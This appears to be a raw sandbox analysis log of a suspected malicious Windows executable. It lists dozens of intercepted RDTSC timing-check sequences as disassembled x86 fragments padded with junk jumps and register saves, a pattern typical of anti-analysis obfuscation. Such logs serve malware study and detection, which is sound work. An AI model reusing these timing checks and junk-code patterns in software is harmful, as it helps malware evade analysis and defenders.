Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74107CC second address: 74107D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74107D2 second address: 7410800 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c jmp 00007FB0A5355D60h 0x00000011 mov dword ptr [esi+2Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410800 second address: 7410804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410804 second address: 741080A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741080A second address: 7410810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410810 second address: 7410814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410814 second address: 741084E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+6Ch] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB0A4FB5B98h 0x00000013 or si, 5098h 0x00000018 jmp 00007FB0A4FB5B8Bh 0x0000001d popfd 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741084E second address: 7410893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB0A5355D64h 0x0000000a sbb cl, FFFFFFF8h 0x0000000d jmp 00007FB0A5355D5Bh 0x00000012 popfd 0x00000013 popad 0x00000014 popad 0x00000015 mov word ptr [esi+30h], ax 0x00000019 pushad 0x0000001a movzx ecx, dx 0x0000001d call 00007FB0A5355D61h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410893 second address: 74108A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov ax, word ptr [ebx+00000088h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74108A6 second address: 74108AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74108AC second address: 74108F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB0A4FB5B97h 0x00000008 pop eax 0x00000009 mov ecx, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov word ptr [esi+32h], ax 0x00000012 pushad 0x00000013 pushad 0x00000014 mov bl, CCh 0x00000016 call 00007FB0A4FB5B98h 0x0000001b pop eax 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f movsx ebx, cx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74108F3 second address: 741090F instructions: 0x00000000 rdtsc 0x00000002 call 00007FB0A5355D5Ah 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [ebx+0000008Ch] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741090F second address: 7410913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410913 second address: 7410917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410917 second address: 741091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741091D second address: 7410948 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB0A5355D5Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410948 second address: 741097F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6F6ADA52h 0x00000008 call 00007FB0A4FB5B93h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [ebx+18h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB0A4FB5B91h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741097F second address: 7410985 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410985 second address: 74109F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c jmp 00007FB0A4FB5B90h 0x00000011 mov eax, dword ptr [ebx+1Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FB0A4FB5B8Dh 0x0000001d sbb cl, FFFFFFE6h 0x00000020 jmp 00007FB0A4FB5B91h 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FB0A4FB5B90h 0x0000002c add ecx, 338D1788h 0x00000032 jmp 00007FB0A4FB5B8Bh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74109F5 second address: 74109FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74109FB second address: 74109FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74109FF second address: 7410A43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+3Ch], eax 0x0000000e pushad 0x0000000f mov bx, cx 0x00000012 pushfd 0x00000013 jmp 00007FB0A5355D60h 0x00000018 adc si, AD18h 0x0000001d jmp 00007FB0A5355D5Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr [ebx+20h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410A43 second address: 7410A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410A47 second address: 7410A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410A4B second address: 7410A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410A51 second address: 7410A57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410A57 second address: 7410A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410A5B second address: 7410AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+40h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB0A5355D5Eh 0x00000012 adc ecx, 0040CEA8h 0x00000018 jmp 00007FB0A5355D5Bh 0x0000001d popfd 0x0000001e mov ax, 819Fh 0x00000022 popad 0x00000023 lea eax, dword ptr [ebx+00000080h] 0x00000029 pushad 0x0000002a call 00007FB0A5355D60h 0x0000002f jmp 00007FB0A5355D62h 0x00000034 pop esi 0x00000035 mov si, dx 0x00000038 popad 0x00000039 push 00000001h 0x0000003b jmp 00007FB0A5355D5Dh 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410AD1 second address: 7410AD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410AD5 second address: 7410ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410ADB second address: 7410B20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, A157h 0x00000007 pushfd 0x00000008 jmp 00007FB0A4FB5B8Ch 0x0000000d and ax, B5C8h 0x00000012 jmp 00007FB0A4FB5B8Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d mov cx, bx 0x00000020 movsx edx, cx 0x00000023 popad 0x00000024 nop 0x00000025 pushad 0x00000026 mov ah, 36h 0x00000028 popad 0x00000029 lea eax, dword ptr [ebp-10h] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FB0A4FB5B8Ah 0x00000033 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410B72 second address: 7410B76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410B76 second address: 7410C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FB0A4FB5B95h 0x0000000c sub ecx, 124231B6h 0x00000012 jmp 00007FB0A4FB5B91h 0x00000017 popfd 0x00000018 popad 0x00000019 mov edi, eax 0x0000001b pushad 0x0000001c mov cx, 0343h 0x00000020 pushfd 0x00000021 jmp 00007FB0A4FB5B98h 0x00000026 jmp 00007FB0A4FB5B95h 0x0000002b popfd 0x0000002c popad 0x0000002d test edi, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FB0A4FB5B93h 0x00000038 jmp 00007FB0A4FB5B93h 0x0000003d popfd 0x0000003e pushfd 0x0000003f jmp 00007FB0A4FB5B98h 0x00000044 or si, 33F8h 0x00000049 jmp 00007FB0A4FB5B8Bh 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410D45 second address: 7410D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410D57 second address: 7410D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d jmp 00007FB0A4FB5B94h 0x00000012 mov si, 7741h 0x00000016 popad 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410D8C second address: 7410D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410D90 second address: 7410DA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410DA9 second address: 7410DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410E14 second address: 7410E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410E18 second address: 7410E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410E1E second address: 7410ECD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A4FB5B8Ch 0x00000009 or esi, 7285EAD8h 0x0000000f jmp 00007FB0A4FB5B8Bh 0x00000014 popfd 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test edi, edi 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FB0A4FB5B91h 0x00000024 adc si, 1A76h 0x00000029 jmp 00007FB0A4FB5B91h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007FB0A4FB5B90h 0x00000035 or cx, 2F98h 0x0000003a jmp 00007FB0A4FB5B8Bh 0x0000003f popfd 0x00000040 popad 0x00000041 js 00007FB1132A43AAh 0x00000047 jmp 00007FB0A4FB5B96h 0x0000004c mov eax, dword ptr [ebp-04h] 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FB0A4FB5B97h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410ECD second address: 7410ED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410ED3 second address: 7410ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410ED7 second address: 7410EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB0A5355D69h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410EFF second address: 7410F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410F03 second address: 7410F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410F09 second address: 7410F88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A4FB5B8Ah 0x00000009 add ah, FFFFFFE8h 0x0000000c jmp 00007FB0A4FB5B8Bh 0x00000011 popfd 0x00000012 call 00007FB0A4FB5B98h 0x00000017 pop eax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b lea eax, dword ptr [ebx+70h] 0x0000001e jmp 00007FB0A4FB5B91h 0x00000023 push 00000001h 0x00000025 jmp 00007FB0A4FB5B8Eh 0x0000002a nop 0x0000002b jmp 00007FB0A4FB5B90h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FB0A4FB5B8Eh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410F88 second address: 7410FE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A5355D61h 0x00000009 jmp 00007FB0A5355D5Bh 0x0000000e popfd 0x0000000f jmp 00007FB0A5355D68h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 pushad 0x00000019 pushad 0x0000001a mov cx, 77F3h 0x0000001e popad 0x0000001f jmp 00007FB0A5355D5Fh 0x00000024 popad 0x00000025 lea eax, dword ptr [ebp-18h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b movsx ebx, ax 0x0000002e movzx eax, bx 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410FE9 second address: 7411009 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411009 second address: 7411034 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 5E48B40Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, ecx 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e mov edx, 1F48DED2h 0x00000013 mov dx, 161Eh 0x00000017 popad 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB0A5355D60h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411034 second address: 741103A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741103A second address: 741103E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74110E3 second address: 7411190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A4FB5B8Fh 0x00000009 or eax, 67A115AEh 0x0000000f jmp 00007FB0A4FB5B99h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+0Ch], eax 0x0000001d pushad 0x0000001e call 00007FB0A4FB5B98h 0x00000023 call 00007FB0A4FB5B92h 0x00000028 pop esi 0x00000029 pop edx 0x0000002a mov si, C507h 0x0000002e popad 0x0000002f mov edx, 757806ECh 0x00000034 jmp 00007FB0A4FB5B8Ah 0x00000039 sub eax, eax 0x0000003b jmp 00007FB0A4FB5B91h 0x00000040 lock cmpxchg dword ptr [edx], ecx 0x00000044 pushad 0x00000045 movzx eax, bx 0x00000048 mov dx, 6C2Ch 0x0000004c popad 0x0000004d pop edi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FB0A4FB5B8Eh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411190 second address: 74111C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007FB0A5355D5Fh 0x00000012 jne 00007FB113644286h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ah, dh 0x0000001d jmp 00007FB0A5355D5Ch 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74111C4 second address: 74111D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A4FB5B8Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74111D6 second address: 7411225 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e jmp 00007FB0A5355D66h 0x00000013 mov eax, dword ptr [esi] 0x00000015 jmp 00007FB0A5355D60h 0x0000001a mov dword ptr [edx], eax 0x0000001c pushad 0x0000001d mov si, C32Dh 0x00000021 mov ch, 65h 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+04h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411225 second address: 741122B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741122B second address: 7411243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411243 second address: 741126E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FB0A4FB5B91h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741126E second address: 74112A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 call 00007FB0A5355D63h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esi+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB0A5355D62h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74112A2 second address: 741131C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A4FB5B91h 0x00000009 or ecx, 55193D06h 0x0000000f jmp 00007FB0A4FB5B91h 0x00000014 popfd 0x00000015 mov edx, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+08h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FB0A4FB5B8Fh 0x00000026 or eax, 30412C3Eh 0x0000002c jmp 00007FB0A4FB5B99h 0x00000031 popfd 0x00000032 call 00007FB0A4FB5B90h 0x00000037 pop ecx 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741131C second address: 7411337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411337 second address: 741139F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+0Ch] 0x0000000e jmp 00007FB0A4FB5B8Eh 0x00000013 mov dword ptr [edx+0Ch], eax 0x00000016 jmp 00007FB0A4FB5B90h 0x0000001b mov eax, dword ptr [esi+10h] 0x0000001e jmp 00007FB0A4FB5B90h 0x00000023 mov dword ptr [edx+10h], eax 0x00000026 pushad 0x00000027 mov edx, ecx 0x00000029 mov dh, ah 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+14h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741139F second address: 74113A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74113A3 second address: 74113A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74113A7 second address: 74113AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74113AD second address: 741142E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB0A4FB5B8Fh 0x00000008 pop ecx 0x00000009 mov di, 51FCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [edx+14h], eax 0x00000013 jmp 00007FB0A4FB5B8Bh 0x00000018 mov eax, dword ptr [esi+18h] 0x0000001b pushad 0x0000001c movzx esi, di 0x0000001f call 00007FB0A4FB5B91h 0x00000024 push esi 0x00000025 pop ebx 0x00000026 pop eax 0x00000027 popad 0x00000028 mov dword ptr [edx+18h], eax 0x0000002b pushad 0x0000002c pushad 0x0000002d mov dx, ADEAh 0x00000031 call 00007FB0A4FB5B8Bh 0x00000036 pop ecx 0x00000037 popad 0x00000038 pushad 0x00000039 mov ebx, 53B7659Ah 0x0000003e mov esi, edi 0x00000040 popad 0x00000041 popad 0x00000042 mov eax, dword ptr [esi+1Ch] 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FB0A4FB5B98h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741142E second address: 7411440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411440 second address: 7411444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
